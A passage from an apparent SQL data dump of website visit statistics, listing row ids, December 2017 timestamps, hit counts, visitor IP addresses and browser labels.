,1,0,0,'46.229.168.69','other'),(184480,1512275580,1,1,0,0,'82.145.222.3','chrome'),(184481,1512275664,1,1,0,0,'91.209.11.236','other'),(184482,1512275689,27,27,0,0,'95.67.80.108','chrome'),(184483,1512275762,1,1,0,0,'46.211.151.159','chrome'),(184484,1512276620,28,28,0,0,'95.67.80.108','chrome'),(184485,1512276779,1,1,0,0,'141.8.142.74','other'),(184486,1512277564,24,24,0,0,'95.67.80.108','chrome'),(184487,1512277812,2,2,0,0,'141.8.142.74','other'),(184488,1512278489,10,10,0,0,'95.67.80.108','chrome'),(184489,1512278850,1,1,0,0,'91.121.86.136','other'),(184490,1512279401,8,8,0,0,'95.67.80.108','chrome'),(184491,1512280087,1,1,0,0,'37.9.113.182','other'),(184492,1512280365,4,4,0,0,'95.67.80.108','chrome'),(184493,1512281297,2,2,0,0,'95.67.80.108','chrome'),(184494,1512281634,1,1,0,0,'54.165.59.7','other'),(184495,1512282350,1,1,0,0,'188.146.106.90','chrome'),(184496,1512282391,2,2,0,0,'141.8.142.74','other'),(184497,1512282948,2,2,0,0,'46.211.157.132','chrome'),(184498,1512283222,34,34,0,0,'107.150.59.98','other'),(184499,1512283240,1,1,0,0,'178.154.171.88','other'),(184500,1512283538,1,1,0,0,'8.29.198.26','other'),(184501,1512285416,1,1,0,0,'141.8.142.74','other'),(184502,1512285861,1,1,0,0,'40.77.167.24','other'),(184503,1512286287,1,1,0,0,'91.233.90.34','other'),(184504,1512286323,2,2,0,0,'40.77.167.60','other'),(184505,1512286516,1,1,0,0,'178.158.232.112','other'),(184506,1512286868,1,1,0,0,'37.54.114.80','chrome'),(184507,1512287176,1,1,0,0,'130.180.217.199','chrome'),(184508,1512287969,1,1,0,0,'207.46.13.162','other'),(184509,1512288170,1,1,0,0,'141.8.142.74','other'),(184510,1512288629,1,1,0,0,'46.201.175.246','other'),(184511,1512289197,1,1,0,0,'91.196.178.167','chrome'),(184512,1512289444,1,1,0,0,'37.47.43.89','chrome'),(184513,1512289812,1,1,0,0,'37.55.57.49','chrome'),(184514,1512289907,1,1,0,0,'141.8.142.74','other'),(184515,1512290003,1,1,0,0,'91.196.178.131','firefox'),(184516,1512290080,1,0,1,0,'66.249.64.30',''),(184517,1512290211,1,1,0,0,'91.196.178.58','chrome'),(184518,1512290405,1,1,0,0,'23.27.230.192','chrome'),(184519,1512290682,1,1,0,0,'91.196.178.66','chrome'),(184520,1512290902,1,1,0,0,'141.8.142.74','other'),(184521,1512291326,1,1,0,0,'138.68.110.49','chrome'),(184522,1512292545,1,1,0,0,'141.8.142.50','other'),(184523,1512292756,1,1,0,0,'207.46.13.79','other'),(184524,1512292786,1,1,0,0,'141.8.142.126','other'),(184525,1512292844,1,1,0,0,'66.249.70.29','chrome'),(184526,1512293027,1,1,0,0,'141.8.142.123','other'),(184527,1512293468,1,1,0,0,'91.196.178.162','chrome'),(184528,1512293772,1,1,0,0,'91.196.178.131','other'),(184529,1512294340,1,1,0,0,'207.46.13.79','other'),(184530,1512294376,1,1,0,0,'8.29.198.27','other'),(184531,1512294696,1,1,0,0,'66.249.64.28','chrome'),(184532,1512294782,1,1,0,0,'178.95.67.25','chrome'),(184533,1512294960,1,1,0,0,'46.211.146.175','chrome'),(184534,1512295333,1,1,0,0,'79.186.71.207','chrome'),(184535,1512295566,1,1,0,0,'141.8.142.74','other'),(184536,1512295646,1,1,0,0,'207.46.13.79','other'),(184537,1512296828,2,2,0,0,'91.196.178.169','firefox'),(184538,1512297323,1,1,0,0,'46.211.100.24','other'),(184539,1512298275,1,1,0,0,'141.8.142.74','other'),(184540,1512298393,1,1,0,0,'91.196.178.161','chrome'),(184541,1512298414,1,1,0,0,'199.58.86.211','other'),(184542,1512298695,1,1,0,0,'91.196.178.169','firefox'),(184543,1512298699,1,1,0,0,'40.77.167.60','other'),(184544,1512298716,1,1,0,0,'46.219.54.199','other'),(184545,1512299508,1,1,0,0,'91.196.177.120','chrome'),(184546,1512299552,1,1,0,0,'37.55.57.49','chrome'),(184547,1512299879,1,1,0,0,'95.132.20.115','firefox'),(184548,1512300405,2,2,0,0,'91.196.178.37','chrome'),(184549,1512300502,1,1,0,0,'207.46.13.79','other'),(184550,1512300715,1,1,0,0,'141.8.142.74','other'),(184551,1512300802,1,1,0,0,'91.196.178.168','chrome'),(184552,1512301660,1,1,0,0,'141.8.142.74','other'),(184553,1512303638,1,1,0,0,'91.196.178.43','chrome'),(184554,1512305208,1,1,0,0,'8.29.198.27','other'),(184555,1512305803,1,1,0,0,'141.8.142.74','other'),(184556,1512305919,1,1,0,0,'87.250.224.46','other'),(184557,1512305947,1,1,0,0,'52.53.129.101','chrome'),(184558,1512306567,1,1,0,0,'77.176.198.57','other'),(184559,1512307313,1,1,0,0,'217.69.133.18','other'),(184560,1512307637,1,1,0,0,'141.8.142.74','other'),(184561,1512309212,1,1,0,0,'91.196.178.163','other'),(184562,1512309290,1,1,0,0,'178.92.139.8','other'),(184563,1512309817,1,1,0,0,'178.92.74.145','chrome'),(184564,1512310046,1,1,0,0,'91.196.178.168','chrome'),(184565,1512310605,1,1,0,0,'176.15.54.168','msie'),(184566,1512310756,1,1,0,0,'91.196.178.70','chrome'),(184567,1512310796,1,1,0,0,'37.55.57.49','chrome'),(184568,1512311184,1,1,0,0,'46.201.113.130','chrome'),(184569,1512311355,1,1,0,0,'178.154.171.88','other'),(184570,1512311666,2,1,1,0,'66.249.70.25',''),(184571,1512312008,1,1,0,0,'37.190.163.241','chrome'),(184572,1512312056,1,0,1,0,'66.249.70.29',''),(184573,1512312607,1,1,0,0,'46.211.204.38','other'),(184574,1512312950,1,1,0,0,'95.135.90.238','chrome'),(184575,1512313035,1,1,0,0,'40.77.167.60','other'),(184576,1512313864,1,1,0,0,'178.154.171.88','other'),(184577,1512313868,1,1,0,0,'141.8.142.74','other'),(184578,1512314302,1,1,0,0,'91.196.178.61','chrome'),(184579,1512314356,1,1,0,0,'91.196.178.164','chrome'),(184580,1512314502,1,1,0,0,'37.73.224.229','chrome'),(184581,1512314848,1,1,0,0,'141.8.142.74','other'),(184582,1512315300,1,0,1,0,'66.249.64.28',''),(184583,1512315816,2,2,0,0,'178.154.171.88','other'),(184584,1512316047,1,1,0,0,'8.29.198.25','other'),(184585,1512316062,1,1,0,0,'46.201.113.195','other'),(184586,1512316444,1,1,0,0,'37.54.115.90','chrome'),(184587,1512316739,2,2,0,0,'141.8.142.74','other'),(184588,1512316806,1,1,0,0,'94.179.247.25','other'),(184589,1512317226,1,1,0,0,'37.115.94.192','chrome'),(184590,1512317747,1,1,0,0,'92.113.157.36','chrome'),(184591,1512317829,1,1,0,0,'37.9.113.182','other'),(184592,1512317887,1,1,0,0,'91.196.178.130','other'),(184593,1512317974,2,2,0,0,'141.8.142.74','other'),(184594,1512318826,10,10,0,0,'136.243.73.76','other'),(184595,1512318868,1,1,0,0,'91.196.178.65','chrome'),(184596,1512319013,1,1,0,0,'78.111.187.234','other'),(184597,1512319409,1,1,0,0,'176.113.170.104','chrome'),(184598,1512319577,1,1,0,0,'40.77.167.77','other'),(184599,1512321617,17,17,0,0,'95.67.80.108','chrome'),(184600,1512321922,1,1,0,0,'141.8.142.74','other'),(184601,1512321968,1,1,0,0,'91.196.179.85','other'),(184602,1512322705,1,1,0,0,'37.55.57.49','chrome'),(184603,1512322732,1,1,0,0,'66.102.9.40','chrome'),(184604,1512323133,1,1,0,0,'46.133.250.93','other'),(184605,1512323562,1,1,0,0,'91.196.178.65','chrome'),(184606,1512323812,1,1,0,0,'107.167.109.99','other'),(184607,1512324233,29,29,0,0,'95.67.80.108','chrome'),(184608,1512324440,1,1,0,0,'92.112.224.242','chrome'),(184609,1512324938,1,1,0,0,'107.167.106.61','other'),(184610,1512325149,16,16,0,0,'95.67.80.108','chrome'),(184611,1512325281,1,1,0,0,'141.8.142.74','other'),(184612,1512325285,1,1,0,0,'178.154.171.88','other'),(184613,1512325710,1,0,1,0,'66.249.64.29',''),(184614,1512325749,1,1,0,0,'40.77.167.24','other'),(184615,1512326078,8,8,0,0,'95.67.80.108','chrome'),(184616,1512326798,2,0,2,0,'66.249.64.28',''),(184617,1512326903,1,1,0,0,'8.29.198.26','other'),(184618,1512327734,1,1,0,0,'95.158.36.194','other'),(184619,1512328360,1,0,1,0,'66.249.70.29',''),(184620,1512328372,1,1,0,0,'176.36.160.250','chrome'),(184621,1512328632,1,1,0,0,'95.85.31.250','chrome'),(184622,1512328854,4,4,0,0,'95.67.80.108','chrome'),(184623,1512329132,1,1,0,0,'92.112.105.245','chrome'),(184624,1512329465,8,8,0,0,'91.196.179.85','other'),(184625,1512329570,2,2,0,0,'84.144.197.224','other'),(184626,1512329646,1,1,0,0,'95.73.119.88','other'),(184627,1512329878,1,1,0,0,'49.213.19.59','chrome'),(184628,1512330588,1,1,0,0,'180.76.15.159','other'),(184629,1512330817,1,1,0,0,'188.166.72.50','other'),(184630,1512331691,1,1,0,0,'40.77.167.60','other'),(184631,1512333308,1,1,0,0,'46.185.2.157','other'),(184632,1512333731,1,0,1,0,'66.249.64.30',''),(184633,1512333793,1,0,1,0,'66.249.70.27',''),(184634,1512334078,1,1,0,0,'178.92.248.28','chrome'),(184635,1512334386,1,1,0,0,'46.242.72.248','msie'),(184636,1512334387,1,1,0,0,'95.28.190.43','msie'),(184637,1512334498,1,1,0,0,'178.18.69.5','other'),(184638,1512334546,1,1,0,0,'95.28.206.18','firefox'),(184639,1512334549,1,1,0,0,'91.196.178.71','chrome'),(184640,1512335703,1,0,1,0,'66.249.70.25',''),(184641,1512336801,1,0,1,0,'66.249.70.29',''),(184642,1512337345,1,1,0,0,'94.178.146.187','chrome'),(184643,1512337398,1,1,0,0,'157.55.39.159','other'),(184644,1512337742,1,1,0,0,'8.29.198.27','other'),(184645,1512337943,1,1,0,0,'188.146.3.9','other'),(184646,1512339640,1,1,0,0,'217.69.133.193','other'),(184647,1512340296,1,1,0,0,'37.54.188.136','chrome'),(184648,1512340443,1,1,0,0,'91.196.178.130','other'),(184649,1512342137,1,1,0,0,'54.165.59.7','other'),(184650,1512343356,1,1,0,0,'91.196.178.69','other'),(184651,1512348581,1,1,0,0,'8.29.198.26','other'),(184652,1512349871,1,1,0,0,'66.249.64.30','chrome'),(184653,1512350741,1,1,0,0,'79.137.44.22','other'),(184654,1512352102,23,23,0,0,'107.150.37.100','other'),(184655,1512354137,2,2,0,0,'54.165.59.7','other'),(184656,1512354183,1,0,1,0,'66.249.64.28',''),(184657,1512358250,1,0,1,0,'66.249.70.27',''),(184658,1512359218,1,0,1,0,'66.249.64.30',''),(184659,1512359423,1,1,0,0,'8.29.198.26','other'),(184660,1512361365,1,1,0,0,'40.77.167.60','other'),(184661,1512361961,1,1,0,0,'107.167.106.145','other'),(184662,1512361981,1,0,1,0,'66.249.70.27',''),(184663,1512363223,1,1,0,0,'79.142.96.232','other'),(184664,1512364425,1,1,0,0,'95.133.153.194','chrome'),(184665,1512364719,1,0,1,0,'66.249.64.30',''),(184666,1512367558,1,1,0,0,'178.154.171.88','other'),(184667,1512367887,1,1,0,0,'40.77.167.24','other'),(184668,1512368469,1,1,0,0,'46.211.150.90','chrome'),(184669,1512368706,1,0,1,0,'66.249.70.29',''),(184670,1512368731,1,1,0,0,'91.196.178.70','firefox'),(184671,1512370259,1,1,0,0,'8.29.198.26','other'),(184672,1512370423,2,2,0,0,'141.8.142.74','other'),(184673,1512370748,1,1,0,0,'91.196.178.68','firefox'),(184674,1512370766,2,2,0,0,'91.196.178.68','chrome'),(184675,1512371045,1,1,0,0,'37.73.222.65','other'),(184676,1512371410,2,2,0,0,'162.220.220.60','other'),(184677,1512371460,1,1,0,0,'93.171.241.65','chrome'),(184678,1512371992,2,2,0,0,'141.8.142.74','other'),(184679,1512372232,1,1,0,0,'178.94.12.171','chrome'),(184680,1512372344,1,1,0,0,'176.36.129.235','other'),(184681,1512372891,1,1,0,0,'91.196.178.166','chrome'),(184682,1512373394,1,1,0,0,'193.107.3.67','other'),(184683,1512373465,1,1,0,0,'178.62.5.157','chrome'),(184684,1512373695,1,1,0,0,'37.52.17.192','chrome'),(184685,1512373924,68,68,0,0,'62.210.157.129','other'),(184686,1512374084,2,2,0,0,'37.54.102.20','chrome'),(184687,1512374335,1,1,0,0,'217.69.133.215','other'),(184688,1512374929,1,0,1,0,'66.249.64.28',''),(184689,1512375105,1,1,0,0,'91.196.178.68','chrome'),(184690,1512375397,1,1,0,0,'91.196.178.68','firefox'),(184691,1512375569,2,2,0,0,'95.213.141.126','opera'),(184692,1512375682,1,1,0,0,'91.196.177.129','chrome'),(184693,1512375731,1,1,0,0,'46.211.147.8','other'),(184694,1512375924,1,1,0,0,'213.109.233.191','chrome'),(184695,1512376111,1,1,0,0,'176.103.8.84','chrome'),(184696,1512376220,1,1,0,0,'91.233.90.115','other'),(184697,1512376839,1,1,0,0,'91.196.178.70','chrome'),(184698,1512376994,1,1,0,0,'178.95.159.6','chrome'),(184699,1512378049,1,1,0,0,'91.196.178.67','chrome'),(184700,1512378254,1,1,0,0,'178.92.170.142','chrome'),(184701,1512378685,1,1,0,0,'37.73.242.44','chrome'),(184702,1512378729,1,1,0,0,'93.74.212.147','firefox'),(184703,1512378796,1,1,0,0,'178.92.137.112','firefox'),(184704,1512378822,1,1,0,0,'31.13.113.190','other'),(184705,1512378973,2,2,0,0,'40.77.167.60','other'),(184706,1512379191,1,1,0,0,'91.196.178.69','chrome'),(184707,1512379328,1,1,0,0,'178.92.170.142','chrome'),(184708,1512379686,1,0,1,0,'66.249.70.27',''),(184709,1512379761,1,0,1,0,'66.249.64.28',''),(184710,1512379997,1,1,0,0,'157.55.39.197','other'),(184711,1512381022,1,1,0,0,'91.196.177.63','other'),(184712,1512381093,1,1,0,0,'91.196.178.68','firefox'),(184713,1512381104,1,1,0,0,'8.29.198.26','other'),(184714,1512381327,1,1,0,0,'188.163.0.233','other'),(184715,1512381415,1,1,0,0,'91.209.11.236','other'),(184716,1512381430,1,1,0,0,'91.196.178.70','chrome'),(184717,1512381597,1,1,0,0,'37.73.249.42','chrome'),(184718,1512382382,1,1,0,0,'91.209.11.236','other'),(184719,1512383187,1,1,0,0,'141.8.142.74','other'),(184720,1512383592,1,1,0,0,'78.111.188.249','chrome'),(184721,1512384495,1,1,0,0,'46.211.147.54','other'),(184722,1512385237,1,1,0,0,'5.9.156.74','other'),(184723,1512385272,1,1,0,0,'212.1.108.150','chrome'),(184724,1512385316,1,1,0,0,'178.92.137.112','firefox'),(184725,1512385458,1,1,0,0,'37.53.173.120','firefox'),(184726,1512385463,1,0,1,0,'66.249.64.30',''),(184727,1512385467,1,1,0,0,'178.154.171.88','other'),(184728,1512385862,1,1,0,0,'91.196.178.166','chrome'),(184729,1512386795,1,1,0,0,'194.0.148.100','firefox'),(184730,1512386897,1,1,0,0,'141.8.142.74','other'),(184731,1512387028,1,1,0,0,'91.196.178.166','chrome'),(184732,1512387644,1,1,0,0,'91.196.178.69','chrome'),(184733,1512388128,1,1,0,0,'178.95.28.163','chrome'),(184734,1512388414,1,0,1,0,'66.249.70.29',''),(184735,1512389021,3,3,0,0,'141.8.142.74','other'),(184736,1512389025,1,1,0,0,'195.46.32.225','chrome'),(184737,1512389815,1,1,0,0,'95.28.196.80','msie'),(184738,1512391681,1,1,0,0,'141.8.142.74','other'),(184739,1512391858,1,1,0,0,'213.180.203.8','other'),(184740,1512391941,1,1,0,0,'8.29.198.27','other'),(184741,1512392005,1,1,0,0,'37.52.17.192','firefox'),(184742,1512392365,1,0,1,0,'66.249.64.28',''),(184743,1512393136,1,1,0,0,'46.211.147.192','other'),(184744,1512393150,1,1,0,0,'91.196.178.163','chrome'),(184745,1512393206,1,1,0,0,'157.55.39.159','other'),(184746,1512393368,1,1,0,0,'66.249.70.27','chrome'),(184747,1512393539,1,1,0,0,'217.69.133.10','other'),(184748,1512393685,1,1,0,0,'91.196.178.169','chrome'),(184749,1512394023,1,1,0,0,'165.227.158.202','other'),(184750,1512394134,2,2,0,0,'141.8.142.74','other'),(184751,1512394215,1,1,0,0,'91.196.179.33','firefox'),(184752,1512394385,1,1,0,0,'66.249.70.25','chrome'),(184753,1512394663,1,1,0,0,'91.196.178.68','firefox'),(184754,1512395074,1,1,0,0,'92.113.31.83','chrome'),(184755,1512395140,1,1,0,0,'91.196.178.65','firefox'),(184756,1512395282,1,1,0,0,'207.46.13.156','other'),(184757,1512395353,1,0,1,0,'66.249.64.30',''),(184758,1512395624,1,0,1,0,'66.249.70.25',''),(184759,1512396276,1,1,0,0,'66.249.64.29','chrome'),(184760,1512396461,1,1,0,0,'173.212.240.226','other'),(184761,1512396470,1,1,0,0,'178.251.109.218','chrome'),(184762,1512396869,1,1,0,0,'91.222.246.222','firefox'),(184763,1512397555,3,3,0,0,'91.196.178.68','chrome'),(184764,1512397997,1,1,0,0,'178.154.171.88','other'),(184765,1512398712,1,1,0,0,'193.25.177.2','other'),(184766,1512399555,1,1,0,0,'178.154.171.88','other'),(184767,1512399604,1,1,0,0,'37.52.16.106','firefox'),(184768,1512399698,1,1,0,0,'91.196.178.70','chrome'),(184769,1512400613,1,0,1,0,'66.249.70.25',''),(184770,1512400658,1,1,0,0,'194.126.182.72','chrome'),(184771,1512400766,1,1,0,0,'91.196.178.69','chrome'),(184772,1512401012,1,1,0,0,'91.196.178.134','other'),(184773,1512401518,1,1,0,0,'91.196.178.162','other'),(184774,1512401611,1,1,0,0,'157.55.39.159','other'),(184775,1512401867,1,1,0,0,'141.8.142.74','other'),(184776,1512402300,1,1,0,0,'80.187.116.82','other'),(184777,1512402382,1,1,0,0,'91.196.178.168','chrome'),(184778,1512402776,1,1,0,0,'8.29.198.26','other'),(184779,1512403022,1,1,0,0,'31.131.106.249','chrome'),(184780,1512403940,1,1,0,0,'91.196.178.69','firefox'),(184781,1512404359,1,0,1,0,'66.249.70.29',''),(184782,1512404522,1,1,0,0,'37.73.202.155','other'),(184783,1512404746,1,1,0,0,'46.211.106.65','other'),(184784,1512404950,1,0,1,0,'66.249.70.25',''),(184785,1512405191,1,0,1,0,'66.249.64.29',''),(184786,1512405894,1,1,0,0,'91.209.11.236','other'),(184787,1512407081,1,1,0,0,'178.154.171.88','other'),(184788,1512408263,1,1,0,0,'82.145.220.102','chrome'),(184789,1512409839,1,1,0,0,'87.250.224.46','other'),(184790,1512410084,1,1,0,0,'217.69.133.252','other'),(184791,1512410331,2,2,0,0,'157.55.39.159','other'),(184792,1512411711,1,1,0,0,'91.196.178.162','chrome'),(184793,1512412679,1,1,0,0,'176.37.233.150','chrome'),(184794,1512412870,1,1,0,0,'141.8.142.74','other'),(184795,1512413486,1,1,0,0,'77.121.155.66','chrome'),(184796,1512413616,1,1,0,0,'8.29.198.26','other'),(184797,1512413787,3,3,0,0,'141.8.142.74','other'),(184798,1512413822,1,1,0,0,'46.48.13.161','chrome'),(184799,1512415001,1,1,0,0,'81.24.208.224','chrome'),(184800,1512415638,1,1,0,0,'91.196.178.100','other'),(184801,1512416107,1,0,1,0,'66.249.64.28',''),(184802,1512416376,1,1,0,0,'141.8.142.74','other'),(184803,1512417584,1,1,0,0,'37.115.134.246','other'),(184804,1512417767,1,1,0,0,'178.158.253.54','other'),(184805,1512418167,1,0,1,0,'66.249.64.30',''),(184806,1512418499,3,3,0,0,'95.10.181.196','other'),(184807,1512419287,1,1,0,0,'141.8.142.74','other'),(184808,1512419331,1,1,0,0,'37.73.202.17','chrome'),(184809,1512419781,1,1,0,0,'207.46.13.156','other'),(184810,1512419836,1,1,0,0,'178.154.171.88','other'),(184811,1512419842,1,1,0,0,'70.214.110.41','other'),(184812,1512420747,1,1,0,0,'141.8.142.74','other'),(184813,1512421065,1,1,0,0,'217.69.133.85','other'),(184814,1512421420,1,1,0,0,'199.58.86.211','other'),(184815,1512421462,1,1,0,0,'40.77.167.24','other'),(184816,1512421513,1,1,0,0,'66.249.64.28','chrome'),(184817,1512421694,1,1,0,0,'176.37.233.150','chrome'),(184818,1512422537,1,1,0,0,'109.86.102.183','other'),(184819,1512423214,1,1,0,0,'141.8.142.74','other'),(184820,1512424116,1,1,0,0,'91.196.178.100','other'),(184821,1512424461,1,1,0,0,'8.29.198.25','other'),(184822,1512424932,6,6,0,0,'46.229.168.67','other'),(184823,1512424965,1,1,0,0,'46.229.168.77','other'),(184824,1512424970,4,4,0,0,'46.229.168.78','other'),(184825,1512424997,4,4,0,0,'46.229.168.74','other'),(184826,1512425018,5,5,0,0,'46.229.168.71','other'),(184827,1512425030,9,9,0,0,'46.229.168.68','other'),(184828,1512425044,1,1,0,0,'217.69.133.218','other'),(184829,1512425063,5,5,0,0,'46.229.168.65','other'),(184830,1512425105,11,11,0,0,'46.229.168.75','other'),(184831,1512425196,5,5,0,0,'46.229.168.70','other'),(184832,1512425212,5,5,0,0,'46.229.168.73','other'),(184833,1512425304,5,5,0,0,'46.229.168.69','other'),(184834,1512425431,5,5,0,0,'46.229.168.79','other'),(184835,1512425440,5,5,0,0,'46.229.168.76','other'),(184836,1512425445,1,1,0,0,'178.154.171.88','other'),(184837,1512425702,3,3,0,0,'46.229.168.80','other'),(184838,1512425877,3,3,0,0,'46.229.168.78','other'),(184839,1512425917,3,3,0,0,'46.229.168.77','other'),(184840,1512425931,1,1,0,0,'109.63.154.13','msie'),(184841,1512425933,1,1,0,0,'128.68.138.65','msie'),(184842,1512426043,8,8,0,0,'46.229.168.74','other'),(184843,1512426133,10,10,0,0,'46.229.168.67','other'),(184844,1512426144,5,5,0,0,'46.229.168.65','other'),(184845,1512426171,8,8,0,0,'46.229.168.72','other'),(184846,1512426185,6,6,0,0,'46.229.168.75','other'),(184847,1512426205,3,3,0,0,'46.229.168.69','other'),(184848,1512426254,10,10,0,0,'46.229.168.70','other'),(184849,1512426371,3,3,0,0,'46.229.168.73','other'),(184850,1512426490,4,4,0,0,'46.229.168.79','other'),(184851,1512426762,7,7,0,0,'46.229.168.80','other'),(184852,1512426819,4,4,0,0,'46.229.168.78','other'),(184853,1512426913,3,3,0,0,'46.229.168.71','other'),(184854,1512426985,6,6,0,0,'46.229.168.74','other'),(184855,1512427078,9,9,0,0,'46.229.168.72','other'),(184856,1512427086,7,7,0,0,'46.229.168.65','other'),(184857,1512427156,6,6,0,0,'46.229.168.70','other'),(184858,1512427166,1,1,0,0,'46.229.168.67','other'),(184859,1512427219,4,4,0,0,'46.229.168.69','other'),(184860,1512427274,1,1,0,0,'46.229.168.68','other'),(184861,1512427330,9,9,0,0,'46.229.168.73','other'),(184862,1512427482,4,4,0,0,'46.229.168.75','other'),(184863,1512427550,2,2,0,0,'46.229.168.77','other'),(184864,1512427625,7,7,0,0,'46.229.168.79','other'),(184865,1512427722,4,4,0,0,'46.229.168.80','other'),(184866,1512427735,11,11,0,0,'46.229.168.78','other'),(184867,1512427814,4,4,0,0,'46.229.168.71','other'),(184868,1512427865,3,3,0,0,'46.229.168.76','other'),(184869,1512428160,10,10,0,0,'46.229.168.74','other'),(184870,1512428200,7,7,0,0,'46.229.168.70','other'),(184871,1512428302,4,4,0,0,'46.229.168.72','other'),(184872,1512428364,11,11,0,0,'46.229.168.68','other'),(184873,1512428427,7,7,0,0,'46.229.168.75','other'),(184874,1512428642,3,3,0,0,'46.229.168.73','other'),(184875,1512428645,3,3,0,0,'46.229.168.67','other'),(184876,1512428693,1,1,0,0,'91.209.11.236','other'),(184877,1512428701,11,11,0,0,'46.229.168.77','other'),(184878,1512428815,7,7,0,0,'46.229.168.79','other'),(184879,1512428843,4,4,0,0,'46.229.168.76','other'),(184880,1512428930,5,5,0,0,'46.229.168.69','other'),(184881,1512428966,14,14,0,0,'173.234.153.122','other'),(184882,1512428996,4,4,0,0,'46.229.168.71','other'),(184883,1512429096,4,4,0,0,'46.229.168.78','other'),(184884,1512429222,6,6,0,0,'46.229.168.70','other'),(184885,1512429344,4,4,0,0,'46.229.168.74','other'),(184886,1512429414,8,8,0,0,'46.229.168.72','other'),(184887,1512429537,1,1,0,0,'141.8.142.74','other'),(184888,1512429549,10,10,0,0,'46.229.168.67','other'),(184889,1512429630,3,3,0,0,'46.229.168.80','other'),(184890,1512429662,12,12,0,0,'46.229.168.68','other'),(184891,1512429681,4,4,0,0,'46.229.168.75','other'),(184892,1512429695,2,2,0,0,'46.229.168.73','other'),(184893,1512429782,3,3,0,0,'46.229.168.76','other'),(184894,1512429817,7,7,0,0,'46.229.168.77','other'),(184895,1512429901,5,5,0,0,'46.229.168.69','other'),(184896,1512429925,7,7,0,0,'46.229.168.65','other'),(184897,1512430096,3,3,0,0,'46.229.168.79','other'),(184898,1512430256,4,4,0,0,'46.229.168.70','other'),(184899,1512430294,1,0,1,0,'66.249.64.30',''),(184900,1512430303,9,9,0,0,'46.229.168.74','other'),(184901,1512430353,8,8,0,0,'46.229.168.72','other'),(184902,1512430431,1,0,1,0,'66.249.64.28',''),(184903,1512430452,1,1,0,0,'195.238.108.89','chrome'),(184904,1512430484,11,11,0,0,'46.229.168.67','other'),(184905,1512430724,3,3,0,0,'46.229.168.78','other'),(184906,1512430764,3,3,0,0,'46.229.168.73','other'),(184907,1512430836,6,6,0,0,'46.229.168.75','other'),(184908,1512430875,6,6,0,0,'46.229.168.76','other'),(184909,1512430890,4,4,0,0,'46.229.168.80','other'),(184910,1512431021,3,3,0,0,'46.229.168.71','other'),(184911,1512431036,4,4,0,0,'46.229.168.79','other'),(184912,1512431061,1,1,0,0,'46.229.168.69','other'),(184913,1512431196,7,7,0,0,'46.229.168.77','other'),(184914,1512431241,4,4,0,0,'46.229.168.65','other'),(184915,1512431250,7,7,0,0,'46.229.168.68','other'),(184916,1512431435,6,6,0,0,'46.229.168.70','other'),(184917,1512431571,5,5,0,0,'46.229.168.67','other'),(184918,1512431584,9,9,0,0,'46.229.168.72','other'),(184919,1512431658,4,4,0,0,'46.229.168.74','other'),(184920,1512431698,6,6,0,0,'46.229.168.73','other'),(184921,1512431717,8,8,0,0,'46.229.168.78','other'),(184922,1512431741,1,0,1,0,'66.249.64.30',''),(184923,1512431894,1,1,0,0,'91.209.11.236','other'),(184924,1512431927,5,5,0,0,'46.229.168.71','other'),(184925,1512432016,5,5,0,0,'46.229.168.80','other'),(184926,1512432102,5,5,0,0,'46.229.168.77','other'),(184927,1512432143,2,2,0,0,'46.229.168.75','other'),(184928,1512432158,7,7,0,0,'46.229.168.79','other'),(184929,1512432195,3,3,0,0,'46.229.168.65','other'),(184930,1512432267,3,3,0,0,'46.229.168.68','other'),(184931,1512432308,5,5,0,0,'46.229.168.69','other'),(184932,1512432324,3,3,0,0,'46.229.168.76','other'),(184933,1512432542,8,8,0,0,'46.229.168.70','other'),(184934,1512432722,1,1,0,0,'46.229.168.67','other'),(184935,1512432885,3,3,0,0,'46.229.168.71','other'),(184936,1512432937,1,1,0,0,'46.229.168.78','other'),(184937,1512432975,1,1,0,0,'46.229.168.72','other'),(184938,1512433046,1,1,0,0,'46.229.168.73','other'),(184939,1512433309,1,0,1,0,'66.249.70.29',''),(184940,1512433800,1,1,0,0,'66.249.64.28','chrome'),(184941,1512435098,1,0,1,0,'66.249.64.28',''),(184942,1512435308,1,1,0,0,'8.29.198.27','other'),(184943,1512435452,1,0,1,0,'66.249.64.29',''),(184944,1512439751,1,0,1,0,'68.180.229.52',''),(184945,1512439879,1,0,1,0,'68.180.229.104',''),(184946,1512440274,1,0,1,0,'66.249.70.29',''),(184947,1512443082,1,0,1,0,'68.180.229.52',''),(184948,1512445964,1,1,0,0,'157.55.39.159','other'),(184949,1512445997,1,0,1,0,'66.249.64.28',''),(184950,1512446149,1,1,0,0,'8.29.198.25','other'),(184951,1512446266,1,1,0,0,'207.46.13.156','other'),(184952,1512446494,1,1,0,0,'37.73.198.15','chrome'),(184953,1512447534,1,0,1,0,'66.249.70.29',''),(184954,1512448032,1,0,1,0,'66.249.64.28',''),(184955,1512448134,1,1,0,0,'217.69.133.13','other'),(184956,1512448431,1,1,0,0,'178.154.171.88','other'),(184957,1512449392,1,1,0,0,'207.46.13.156','other'),(184958,1512450397,40,40,0,0,'37.17.172.122','firefox'),(184959,1512451302,27,27,0,0,'37.17.172.122','firefox'),(184960,1512451364,1,0,1,0,'68.180.229.104',''),(184961,1512451679,1,1,0,0,'37.115.134.246','other'),(184962,1512452097,1,0,1,0,'66.249.64.29',''),(184963,1512452443,1,0,1,0,'68.180.229.52',''),(184964,1512452951,1,1,0,0,'77.91.148.16','chrome'),(184965,1512453284,1,1,0,0,'95.132.19.213','chrome'),(184966,1512453709,1,0,1,0,'66.249.64.28',''),(184967,1512454722,1,0,1,0,'66.249.70.29',''),(184968,1512455018,2,2,0,0,'157.55.39.159','other'),(184969,1512455239,1,1,0,0,'46.48.13.161','chrome'),(184970,1512456950,1,1,0,0,'91.196.177.20','chrome'),(184971,1512456984,1,1,0,0,'8.29.198.26','other'),(184972,1512457400,1,1,0,0,'195.10.210.49','chrome'),(184973,1512457417,1,1,0,0,'91.196.178.72','firefox'),(184974,1512457729,1,1,0,0,'46.211.158.90','chrome'),(184975,1512458469,1,1,0,0,'92.113.17.179','chrome'),(184976,1512459320,1,1,0,0,'95.134.217.139','firefox'),(184977,1512459429,1,1,0,0,'207.46.13.81','other'),(184978,1512459769,1,1,0,0,'176.37.233.150','chrome'),(184979,1512460214,1,1,0,0,'66.249.70.27','chrome'),(184980,1512460226,1,1,0,0,'66.249.64.29','chrome'),(184981,1512460290,1,1,0,0,'91.196.177.15','chrome'),(184982,1512460313,1,1,0,0,'91.196.178.65','firefox'),(184983,1512460610,1,1,0,0,'207.46.13.81','other'),(184984,1512461182,1,1,0,0,'82.145.220.53','chrome'),(184985,1512461481,1,1,0,0,'31.43.63.112','chrome'),(184986,1512462204,1,1,0,0,'95.132.43.234','firefox'),